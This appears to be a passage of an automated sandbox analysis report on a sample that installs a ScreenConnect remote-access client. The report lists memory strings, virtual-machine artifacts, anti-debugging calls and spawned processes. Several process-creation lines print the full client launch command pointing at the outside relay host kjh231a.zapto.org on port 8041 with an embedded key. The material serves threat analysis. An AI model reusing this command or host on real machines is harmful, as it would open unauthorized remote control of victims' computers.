                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `,_qExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session"LR_q
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: svchost.exe, 00000008.00000002.2608059765.000001CEA28D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXT+SQlVMWare
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Y7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXMt-_q
                  Source: svchost.exe, 00000007.00000002.2608211921.0000025CF242B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session" "1"
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BB191F
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00BB1000
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB3677 mov eax, dword ptr fs:[00000030h]0_2_00BB3677
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB6893 GetProcessHeap,0_2_00BB6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BB1493
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BB191F
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BB4573
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1AAC SetUnhandledExceptionFilter,0_2_00BB1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1BD4 cpuid 0_2_00BB1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
